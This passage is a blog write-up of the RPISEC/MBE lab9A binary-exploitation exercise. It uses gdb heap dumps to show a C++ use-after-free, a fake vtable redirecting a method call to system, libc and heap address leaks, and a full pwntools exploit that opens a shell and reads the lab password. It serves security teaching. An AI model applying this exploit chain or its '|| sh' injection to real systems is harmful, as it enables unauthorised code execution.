Since add is the third entry within the vtable eax is incremented by 8:

   0x08049258 <+145>:   add    eax,0x8

After this eax contains the address of the third entry in the vtable: 0x8049ab0.

Now the value stored there is loaded to eax:

   0x0804925b <+148>:   mov    eax,DWORD PTR [eax]

Finally eax contains the address of the method add (0x80496e0) and the call can be made:

   0x08049278 <+177>:   call   eax

After this little excursus let's get back to verification of our assumption that the hashset_int instances can be accessed even after deletion:

gdb-peda$ c
Continuing.
4
Which set?: 0
+----------- clark's improved item storage -----------+
| [ -- Now using HashSets for insta-access to items!  |
| 1. Open a lockbox                                   |
| 2. Add an item to a lockbox                         |
| 3. Get an item from a lockbox                       |
| 4. Destroy your lockbox and items in it             |
| 5. Exit                                             |
+-----------------------------------------------------+
Enter choice: ^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$ x/100xw 0x804c000
0x804c000:      0x00000000      0x00000029      0x0804c030      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000019
0x804c030:      0x00000000      0x0000000a      0x00000000      0x0804c048
0x804c040:      0x00000000      0x00000031      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00020f91      0x00000000      0x00000000
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
...

I selected 4. Destroy your lockbox and items in it to deallocate the hashset_int instance. As we suspected the set_vec array on the heap still contains the pointer to the object: 0x0804c030. You can also see that the first 4 bytes of the object at 0x804c030 have been set to 0x00000000. Because this is where the vtable was stored, it comes as little surprise that a subsequent call to add does not succeed:

gdb-peda$ c
Continuing.
2
Which lockbox?: 0
Item value: 1337

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x8
EBX: 0xb7ec3000 --> 0x1a9da8
ECX: 0xb7ec48a4 --> 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6c8 --> 0xbffff6f8 --> 0x0
ESP: 0xbffff6a0 --> 0x804b0c0 --> 0xb7fc366c --> 0xb7f68000 (<_ZNSoD1Ev>:       push   ebx)
EIP: 0x804925b (<_Z11do_add_itemPP7HashSetIi8hash_numE+148>:    mov    eax,DWORD PTR [eax])
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8049254 <_Z11do_add_itemPP7HashSetIi8hash_numE+141>:       mov    eax,DWORD PTR [eax]
   0x8049256 <_Z11do_add_itemPP7HashSetIi8hash_numE+143>:       mov    eax,DWORD PTR [eax]
   0x8049258 <_Z11do_add_itemPP7HashSetIi8hash_numE+145>:       add    eax,0x8
=> 0x804925b <_Z11do_add_itemPP7HashSetIi8hash_numE+148>:       mov    eax,DWORD PTR [eax]
   0x804925d <_Z11do_add_itemPP7HashSetIi8hash_numE+150>:       mov    edx,DWORD PTR [ebp-0x10]
   0x8049260 <_Z11do_add_itemPP7HashSetIi8hash_numE+153>:       lea    ecx,[edx*4+0x0]
   0x8049267 <_Z11do_add_itemPP7HashSetIi8hash_numE+160>:       mov    edx,DWORD PTR [ebp+0x8]
   0x804926a <_Z11do_add_itemPP7HashSetIi8hash_numE+163>:       add    edx,ecx
[------------------------------------stack-------------------------------------]
0000| 0xbffff6a0 --> 0x804b0c0 --> 0xb7fc366c --> 0xb7f68000 (<_ZNSoD1Ev>:      push   ebx)
0004| 0xbffff6a4 --> 0x8049a02 ("Item value: ")
0008| 0xbffff6a8 --> 0xbffff6f8 --> 0x0
0012| 0xbffff6ac --> 0xb7f693f5 (<_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc+53>:  add    esp,0x10)
0016| 0xbffff6b0 --> 0x804b0c0 --> 0xb7fc366c --> 0xb7f68000 (<_ZNSoD1Ev>:      push   ebx)
0020| 0xbffff6b4 --> 0x8049a55 ("Enter choice: ")
0024| 0xbffff6b8 --> 0x0
0028| 0xbffff6bc --> 0x539
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV

Segmentation fault. The instruction which caused the segmentation fault tried to read the third entry from the vtable. Since the vtable was set to 0x00000000 the third entry resulted in the invalid address 0x08 (see eax).

What conclusions can we draw from our previous examinations?
–> Deallocated instances are still referenced and can be accessed just as allocated instances.
–> If we manage to overwrite the vtable of an deallocated instance, this vtable address will be used on a method call.
–> If we store a fake vtable at this address and set it up appropriately, we can trigger any function we would like to call.

In order to set up the heap appropriately a basic understanding of the heap memory management is required:
–> When possible deallocated memory chunks on the heap are coalesced.
–> Deallocated heap chunks in between allocated memory are stored in data structures called bins.
    – bins are linked lists of deallocated chunks.
    – The head pointers of these lists are stored in the main area within the libc.
–> Small deallocated heap chunks (from 16 to 80 bytes) are stored in fastbins.
    – There are 10 fastbins.
    – fastbins are singly linked lists and thus only hold a forward pointer (FD).
    – fastbins are not coalesced.

It is not necessary to understand all details in order to finish this level, but it does not harm anyway. If you would like to know more about the libc heap management I recommend this article.

At first let's start by playing around a little bit with the memory on the heap allocating / deallocating hashset_int instances with the goal in mind to overwrite the vtable of a deallocated instance:

gdb-peda$ r
Starting program: /levels/lab09/lab9A
+----------- clark's improved item storage -----------+
| [ -- Now using HashSets for insta-access to items!  |
| 1. Open a lockbox                                   |
| 2. Add an item to a lockbox                         |
| 3. Get an item from a lockbox                       |
| 4. Destroy your lockbox and items in it             |
| 5. Exit                                             |
+-----------------------------------------------------+
Enter choice: 1
Which lockbox do you want?: 0
How many items will you store?: 20
...
Enter choice: 1
Which lockbox do you want?: 1
How many items will you store?: 20
...
Enter choice: ^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$ x/100xw 0x804c000
0x804c000:      0x00000000      0x00000029      0x0804c030      0x0804c0a0
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000019
0x804c030:      0x08049aa8      0x00000014      0x00000000      0x0804c048
0x804c040:      0x00000000      0x00000059      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000019
0x804c0a0:      0x08049aa8      0x00000014      0x00000000      0x0804c0b8
0x804c0b0:      0x00000000      0x00000059      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0e0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0f0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c100:      0x00000000      0x00000000      0x00000000      0x00020ef9
...

I created two hashset_int instances with a size of 20. We can see both instances on the heap: the first one being located at 0x804c030 and the second one being located at 0x0804c0a0. The first 4 bytes of both instances is the vtable of hashset_int stored at 0x08049aa8.

Now let's deallocate these instances and create a new, smaller one:

gdb-peda$ c
Continuing.
4
Which set?: 1
...
Enter choice: 4
Which set?: 0
...
Enter choice: 1
Which lockbox do you want?: 0
How many items will you store?: 4
...
Enter choice: ^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$ x/100xw 0x804c000
0x804c000:      0x00000000      0x00000029      0x0804c030      0x0804c0a0
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000019
0x804c030:      0x08049aa8      0x00000004      0x00000000      0x0804c0a0
0x804c040:      0x00000000      0x00000059      0xb7ec3450      0xb7ec3450
0x804c050:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000058      0x00000018
0x804c0a0:      0x00000000      0x00000014      0x00000000      0x0804c0b8
0x804c0b0:      0x00000000      0x00020f51      0x00000000      0x00000000
...

The new instances we created was again stored at 0x0804c030. But have a look at the set_data array at 0x804c03c. The array is stored at 0x0804c0a0. This is exactly the address which has been used before for the second instance which we have already deleted. Within the pointer array set_vec on the first line we can see that the deleted instance is still referenced: 0x0804c0a0.

This means that set_data[0] is referencing the vtable of the second, already deallocated instance. If we want to store a value there, we must consider how the add method chooses the index:

HashSet<T, HashFunc>::add(T val)
{
    int index = this->m_hash(val) % this->m_size;
    this->set_data[index] = val;
}

The index is defined by this->m_hash(val) % this->m_size. Because m_hash simply returns the provided value, it is basically val % m_size. Because we created the new instance with a size of 4, the value we want to store in set_data[0] has to fulfill the equation val % 4 = 0.

Let's just store some random value there which fulfills the equation and verify that we control the instruction pointer:

gdb-peda$ c
Continuing.
2
Which lockbox?: 0
Item value: 78704
+----------- clark's improved item storage -----------+
| [ -- Now using HashSets for insta-access to items!  |
| 1. Open a lockbox                                   |
| 2. Add an item to a lockbox                         |
| 3. Get an item from a lockbox                       |
| 4. Destroy your lockbox and items in it             |
| 5. Exit                                             |
+-----------------------------------------------------+
Enter choice: ^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$ x/100xw 0x804c000
0x804c000:      0x00000000      0x00000029      0x0804c030      0x0804c0a0
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:#     0x00000000      0x00000000      0x00000000      0x00000019
0x804c030:      0x08049aa8      0x00000004      0x00000000      0x0804c0a0
0x804c040:      0x00000000      0x00000059      0xb7ec3450      0xb7ec3450
0x804c050:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000058      0x00000018
0x804c0a0:      0x00013370      0x00000014      0x00000000      0x0804c0b8
0x804c0b0:      0x00000000      0x00020f51      0x00000000      0x00000000
...

I added the value 78704 = 0x13370 to the new instance. As we can see this value has been stored at 0x804c0a0.

If we now trigger a method call on the second instance...

gdb-peda$ c
Continuing.
3
Which lockbox?: 1
Item value: 0

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x1337c
EBX: 0xb7ec3000 --> 0x1a9da8
ECX: 0xb7ec48a4 --> 0x0
EDX: 0x4
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6c8 --> 0xbffff6f8 --> 0x0
ESP: 0xbffff6a0 --> 0x804b0c0 --> 0xb7fc366c --> 0xb7f68000 (<_ZNSoD1Ev>:       push   ebx)
EIP: 0x804931b (<_Z12do_find_itemPP7HashSetIi8hash_numE+159>:   mov    eax,DWORD PTR [eax])
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8049314 <_Z12do_find_itemPP7HashSetIi8hash_numE+152>:      mov    eax,DWORD PTR [eax]
   0x8049316 <_Z12do_find_itemPP7HashSetIi8hash_numE+154>:      mov    eax,DWORD PTR [eax]
   0x8049318 <_Z12do_find_itemPP7HashSetIi8hash_numE+156>:      add    eax,0xc
=> 0x804931b <_Z12do_find_itemPP7HashSetIi8hash_numE+159>:      mov    eax,DWORD PTR [eax]
   0x804931d <_Z12do_find_itemPP7HashSetIi8hash_numE+161>:      mov    edx,DWORD PTR [ebp-0x14]
   0x8049320 <_Z12do_find_itemPP7HashSetIi8hash_numE+164>:      lea    ecx,[edx*4+0x0]
   0x8049327 <_Z12do_find_itemPP7HashSetIi8hash_numE+171>:      mov    edx,DWORD PTR [ebp+0x8]
   0x804932a <_Z12do_find_itemPP7HashSetIi8hash_numE+174>:      add    edx,ecx
[------------------------------------stack-------------------------------------]
0000| 0xbffff6a0 --> 0x804b0c0 --> 0xb7fc366c --> 0xb7f68000 (<_ZNSoD1Ev>:      push   ebx)
0004| 0xbffff6a4 --> 0x8049a02 ("Item value: ")
0008| 0xbffff6a8 --> 0xbffff6f8 --> 0x0
0012| 0xbffff6ac --> 0xb7f693f5 (<_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc+53>:  add    esp,0x10)
0016| 0xbffff6b0 --> 0x804b0c0 --> 0xb7fc366c --> 0xb7f68000 (<_ZNSoD1Ev>:      push   ebx)
0020| 0xbffff6b4 --> 0x1
0024| 0xbffff6b8 --> 0x0
0028| 0xbffff6bc --> 0xffffffff
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804931b in do_find_item(HashSet<int, hash_num>**) ()
gdb-peda$

... we get a segmentation fault. But we do not control the instruction pointer yet. The function do_find_item tried to invoke the method find on the second instance. Because this is the fourth method in the vtable the value 0xc has been added to 0x13370. When trying to load the address of the method find from 0x1337c a segmentation fault is raised. Thus in order to finally control the instruction pointer we have to set up a fake vtable:

gdb-peda$ r
Starting program: /levels/lab09/lab9A
+----------- clark's improved item storage -----------+
| [ -- Now using HashSets for insta-access to items!  |
| 1. Open a lockbox                                   |
| 2. Add an item to a lockbox                         |
| 3. Get an item from a lockbox                       |
| 4. Destroy your lockbox and items in it             |
| 5. Exit                                             |
+-----------------------------------------------------+
Enter choice: 1
Which lockbox do you want?: 0
How many items will you store?: 20
...
Enter choice: 1
Which lockbox do you want?: 1
How many items will you store?: 20
...
Enter choice: 4
Which set?: 1
...
Enter choice: 4
Which set?: 0
...
Enter choice: 1
Which lockbox do you want?: 0
How many items will you store?: 4
...
Enter choice: 1
Which lockbox do you want?: 2
How many items will you store?: 4
...
Enter choice: ^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$ x/100xw 0x804c000
0x804c000:      0x00000000      0x00000029      0x0804c030      0x0804c0a0
0x804c010:      0x0804c048      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000019
0x804c030:      0x08049aa8      0x00000004      0x00000000      0x0804c0a0
0x804c040:      0x00000000      0x00000019      0x08049aa8      0x00000004
0x804c050:      0x00000000      0x0804c060      0x00000000      0x00000019
0x804c060:      0xb7ec3450      0xb7ec3450      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000029      0xb7ec3450      0xb7ec3450
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000028      0x00000018
0x804c0a0:      0x00000000      0x00000014      0x00000000      0x0804c0b8
0x804c0b0:      0x00000000      0x00020f51      0x00000000      0x00000000
...

I created and deleted the instances just like before but added another instance at index 2 with the size of 4. This instance has been stored at 0x0804c048. The set_data array of this instances is stored at 0x0804c060. We can use this array as our fake vtable.

Since we want to get a shell we can store the address of system in our vtable keeping in mind that we have not leaked the base address of libc as well was the heap's address yet (we get to this later).

gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xb7d59190 <__libc_system>
gdb-peda$ ! rax2 0xb7d59190
3084226960
gdb-peda$ c
Continuing.

Program received signal SIGALRM, Alarm clock.
2
Which lockbox?: 2
Item value: 3084226960
...
Enter choice: ^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$ x/100xw 0x804c000
0x804c000:      0x00000000      0x00000029      0x0804c030      0x0804c0a0
0x804c010:      0x0804c048      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000019
0x804c030:      0x08049aa8      0x00000004      0x00000000      0x0804c0a0
0x804c040:      0x00000000      0x00000019      0x08049aa8      0x00000004
0x804c050:      0x00000000      0x0804c060      0x00000000      0x00000019
0x804c060:      0xb7d59190      0xb7ec3450      0x00000000      0x00000000
...

The address of system (0xb7d59190) has been stored at the first index of the array at 0x804c060 because 0xb7d59190 % 4 = 0.

The next step is to set the vtable pointer of the second, deallocated instance appropriately. Since we are going to invoke the method find we have to keep in mind that the address of system has to be the fourth entry within our fake vtable. Thus we have to subtract 0xc from 0x804c060 and store this value in the first new instance:

gdb-peda$ p 0x804c060 - 0xc
$2 = 0x804c054
gdb-peda$ ! rax2 0x804c054
134529108
gdb-peda$ c
Continuing.
2
Which lockbox?: 0
Item value: 134529108
...
Enter choice: ^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$ x/100xw 0x804c000
0x804c000:      0x00000000      0x00000029      0x0804c030      0x0804c0a0
0x804c010:      0x0804c048      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000019
0x804c030:      0x08049aa8      0x00000004      0x00000000      0x0804c0a0
0x804c040:      0x00000000      0x00000019      0x08049aa8      0x00000004
0x804c050:      0x00000000      0x0804c060      0x00000000      0x00000019
0x804c060:      0xb7d59190      0xb7ec3450      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000029      0xb7ec3450      0xb7ec3450
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000028      0x00000018
0x804c0a0:      0x0804c054      0x00000014      0x00000000      0x0804c0b8
0x804c0b0:      0x00000000      0x00020f51      0x00000000      0x00000000
...

The value 0x0804c054 has been successfully written to the vtable of the second, deallocated instance. Since all involved addresses are 4 byte aligned the value has been stored at the first index.

Now let's set up a breakpoint at the system function and see if the function is triggered:

gdb-peda$ b *system
Breakpoint 1 at 0xb7d59190: file ../sysdeps/posix/system.c, line 178.
gdb-peda$ c
Continuing.
3
Which lockbox?: 1
Item value: 0
[----------------------------------registers-----------------------------------]
EAX: 0xb7d59190 (<__libc_system>:       push   ebx)
EBX: 0xb7ec3000 --> 0x1a9da8
ECX: 0x0
EDX: 0x804c0a0 --> 0x804c054 --> 0x804c060 --> 0xb7d59190 (<__libc_system>:     push   ebx)
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6c8 --> 0xbffff6f8 --> 0x0
ESP: 0xbffff69c --> 0x804933a (<_Z12do_find_itemPP7HashSetIi8hash_numE+190>:    mov    DWORD PTR [ebp-0xc],eax)
EIP: 0xb7d59190 (<__libc_system>:       push   ebx)
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7d59183 <cancel_handler+227>:     ret
   0xb7d59184:  lea    esi,[esi+0x0]
   0xb7d5918a:  lea    edi,[edi+0x0]
=> 0xb7d59190 <__libc_system>:  push   ebx
   0xb7d59191 <__libc_system+1>:        sub    esp,0x8
   0xb7d59194 <__libc_system+4>:        mov    eax,DWORD PTR [esp+0x10]
   0xb7d59198 <__libc_system+8>:        call   0xb7e3f94b <__x86.get_pc_thunk.bx>
   0xb7d5919d <__libc_system+13>:       add    ebx,0x169e63
[------------------------------------stack-------------------------------------]
0000| 0xbffff69c --> 0x804933a (<_Z12do_find_itemPP7HashSetIi8hash_numE+190>:   mov    DWORD PTR [ebp-0xc],eax)
0004| 0xbffff6a0 --> 0x804c0a0 --> 0x804c054 --> 0x804c060 --> 0xb7d59190 (<__libc_system>:     push   ebx)
0008| 0xbffff6a4 --> 0x0
0012| 0xbffff6a8 --> 0xbffff6f8 --> 0x0
0016| 0xbffff6ac --> 0xb7f693f5 (<_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc+53>:  add    esp,0x10)
0020| 0xbffff6b0 --> 0x804b0c0 --> 0xb7fc366c --> 0xb7f68000 (<_ZNSoD1Ev>:      push   ebx)
0024| 0xbffff6b4 --> 0x1
0028| 0xbffff6b8 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, __libc_system (line=0x804c0a0 "T\300\004\b\024") at ../sysdeps/posix/system.c:178
178     ../sysdeps/posix/system.c: No such file or directory.
gdb-peda$

Great! The function system has been called. But wait. What is the second item on the stack? The function expects the one and only argument here: the command to be executed. The value 0x804c0a0 is stored there. We know this value. It is the pointer to our hashset_int instance. In this case it is the this pointer which is passed as the first argument to any class method. Otherwise the method could not determine on which object the method should be applied. The this pointer is implicitly added to any method by the compiler.

A method like this:

HashSet<T, HashFunc>::find(T val)

Actually looks like this:

HashSet<T, HashFunc>::find(HashSet<T, HashFunc> *this, T val)

What does this mean for our exploit? We can call the function system but we cannot fully control the first argument being passed which we would like to set to the string /bin/sh.

As for now the first argument points to the second, deallocated instance which begins with the address of the fake vtable we set up. We cannot change this first 4 bytes because otherwise our vtable would not be used. But we can change the following bytes. But how do us help this? Here comes in a little trick.

We actually want to execute /bin/sh simply like this:

lab9A@warzone:/levels/lab09$ /bin/sh
$ id
uid=1034(lab9A) gid=1035(lab9A) groups=1035(lab9A),1001(gameuser)

But we could also do this:

lab9A@warzone:/levels/lab09$ JUNK||/bin/sh
JUNK: command not found
$ id
uid=1034(lab9A) gid=1035(lab9A) groups=1035(lab9A),1001(gameuser)

JUNK is not a valid command. But since we added an OR (||) we get a shell nonetheless.

Since we are a little bit limited which value can be stored at which index in the array because of the modulo operation in add we have find appropriate values to create a string which suffices our needs. I ended up with the following:

set_data[0] = 0x804c054   <-- address of fake vtable
set_data[1] = "aaaa"      <-- value as DWORD in little-endian: 0x61616161 % 4 = 1
set_data[2] = "2 ||"      <-- value as DWORD in little-endian: 0x7c7c2032 % 4 = 2
set_data[3] = "sh\x00"    <-- value as DWORD in little-endian: 0x00006873 % 4 = 3

This way the final string being passed as the first argument to system is "\x54\xc0\x04\08aaaa2 || sh".

There is only one thing left to do before we can finish our exploit: we have to leak the libc base address as well as the heap's address. As you may have noticed this is not really a problem because the addresses are on the heap after we created and deleted two instances and can be printed using the function do_find_item:

gdb-peda$ r
Starting program: /levels/lab09/lab9A
+----------- clark's improved item storage -----------+
| [ -- Now using HashSets for insta-access to items!  |
| 1. Open a lockbox                                   |
| 2. Add an item to a lockbox                         |
| 3. Get an item from a lockbox                       |
| 4. Destroy your lockbox and items in it             |
| 5. Exit                                             |
+-----------------------------------------------------+
Enter choice: 1
Which lockbox do you want?: 0
How many items will you store?: 20
...
Enter choice: 1
Which lockbox do you want?: 1
How many items will you store?: 20
...
Enter choice: 4
Which set?: 1
...
Enter choice: 4
Which set?: 0
...
Enter choice: 1
Which lockbox do you want?: 0
How many items will you store?: 4
...
Enter choice: 1
Which lockbox do you want?: 2
How many items will you store?: 4
...
Enter choice: ^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$ x/100xw 0x804c000
0x804c000:      0x00000000      0x00000029      0x0804c030      0x0804c0a0
0x804c010:      0x0804c048      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000019
0x804c030:      0x08049aa8      0x00000004      0x00000000      0x0804c0a0
0x804c040:      0x00000000      0x00000019      0x08049aa8      0x00000004
0x804c050:      0x00000000      0x0804c060      0x00000000      0x00000019
0x804c060:      0xb7ec3450      0xb7ec3450      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000029      0xb7ec3450      0xb7ec3450
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000028      0x00000018
0x804c0a0:      0x00000000      0x00000014      0x00000000      0x0804c0b8
0x804c0b0:      0x00000000      0x00020f51      0x00000000      0x00000000
...

At 0x804c060 and 0x804c060 a libc address is stored: 0xb7ec3450. This is the forward (FD) and backward pointer (BK) of the deallocated chunk. Because this chunk is surrounded by allocated memory it cannot be coalesced and is stored in a bin. Since it is the first element of this bin, the forward and backward pointer is referencing the main_arena within the libc. We can use this address to calculate the address of system:

gdb-peda$ c
Continuing.
3
Which lockbox?: 2
Item value: 0
Item Found
lockbox[0] = -1209256880
...
^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xb7d59190 <__libc_system>
gdb-peda$ ! rax2 -1209256880
0xffffffffb7ec3450
gdb-peda$ p 0xb7ec3450 - 0xb7d59190
$2 = 0x16a2c0

In the heap output above there is also a heap address which we can leak at 0x804c0ac:

Enter choice: 3
Which lockbox?: 0
Item value: 3
Item Found
lockbox[3] = 134529208
...
gdb-peda$ ! rax2 134529208
0x804c0b8
gdb-peda$ i proc mappings
process 31455
Mapped address spaces:

        Start Addr   End Addr       Size     Offset objfile
         0x8048000  0x804a000     0x2000        0x0 /levels/lab09/lab9A
         0x804a000  0x804b000     0x1000     0x1000 /levels/lab09/lab9A
         0x804b000  0x804c000     0x1000     0x2000 /levels/lab09/lab9A
         0x804c000  0x806d000    0x21000        0x0 [heap]
...
gdb-peda$ p 0x804c0b8 - 0x804c000
$3 = 0xb8

At last we can write the final exploit-script:

lab9A@warzone:/levels/lab09$ cat /tmp/exploit_lab9A.py
from pwn import *


def open(p, idx, size):
  p.sendline("1")
  p.sendline(str(idx))
  p.sendline(str(size))
  p.recv(1000)


def delete(p, idx):
  p.sendline("4")
  p.sendline(str(idx))
  p.recv(1000)


def add(p, idx, val):
  p.sendline("2")
  p.sendline(str(idx))
  p.sendline(str(val))
  p.recv(1000)


def get(p, idx, val):
  p.sendline("3")
  p.sendline(str(idx))
  p.sendline(str(val))
  p.recvuntil("lockbox["+str(val)+"] = ")
  ret = p.recv(1000)
  ret = ret[0:ret.index("\n")]
  ret = int(ret, 10)
  if (ret < 0): ret = -((ret-1)^0xffffffff) # value might be negative in two's complement
  return ret


p = remote("localhost", 9941)
p.recv(1000)

open(p, 0, 20)
open(p, 1, 20)
delete(p, 1)
delete(p, 0)
open(p, 0, 4)
open(p, 2, 4)

# leak libc
leak_libc = get(p, 2, 0)
log.success("leak_libc: " + hex(leak_libc))

# leak heap
leak_heap = get(p, 0, 3)
log.success("leak_heap: " + hex(leak_heap)) # leak heap_base + 0xb8

# set up fake vtable
add(p, 2, leak_libc - 0x16a2c0) # leak_libc is at offset 0x16a2c0 from system

# overwrite vtable with fake vtable
add(p, 0, leak_heap - 0x58 - 0xc)

# append string to argument for system
add(p, 0, 0x61616161) # "aaaa"
add(p, 0, 0x7c7c2032) # "2 ||"
add(p, 0, 0x00006873) # "sh"

# invoke find-method, trigger system call
p.sendline("3\n1\n0")
p.recvuntil("Item value: ")

p.interactive()

Running the script:

lab9A@warzone:/levels/lab09$ python /tmp/exploit_lab9A.py
[+] Opening connection to localhost on port 9941: Done
[+] leak_libc: 0xb766b450
[+] leak_heap: 0x8f4e0b8
[*] Switching to interactive mode
$ id
uid=1035(lab9end) gid=1036(lab9end) groups=1036(lab9end),1001(gameuser)
$ cat /home/lab9end/.pass
1_d1dNt_3v3n_n33d_4_Hilti_DD350

Done! The final password for this lab is 1_d1dNt_3v3n_n33d_4_Hilti_DD350.

8 Replies to “RPISEC/MBE: writeup lab09 (C++)”

    1. Hey hux, thank you!
      I hope that I’ll find the time to add some more heap related articles soon 🙂 If you haven’t ckecked out yet, I wrote an article about off-by-one heap based exploitation: https://devel0pment.de/?p=688

        1. Hey g0phs,
          thanks for dropping a comment. Unfortunately I can’t really promise to finish a writeup for lab10 soon as I am quite busy atm ( I suppose that’s what you are talking about 😉 ).

  1. I just wanted to say a big thank you for all of your write-ups in this series, and on this blog as a whole. The details that you put into these are seriously incredible and easily the best I’ve seen. Really appreciate the time you put and the knowledge that you share!

  2. Finally! Scryh, thanks for your effort for writing such a good series. I’m always curious to pwn but get stucked at basic problems. Following your vivid instructions and explanations, now I know how to think problems, use tools and where to further exploration! I still have much to learn and need to practice much but it’s a good start I think. And I would go back to check this wp series frequently since I can’t yet get all the tricks :O.
    But anyway, thanks! I begin to believe that I can learn binary exploination. Will look for your future articles!

    1. Hey smile,
      I am really glad to hear that. Thanks a lot for your feedback 🙂
      Keep on pwning! =)

Comments are closed.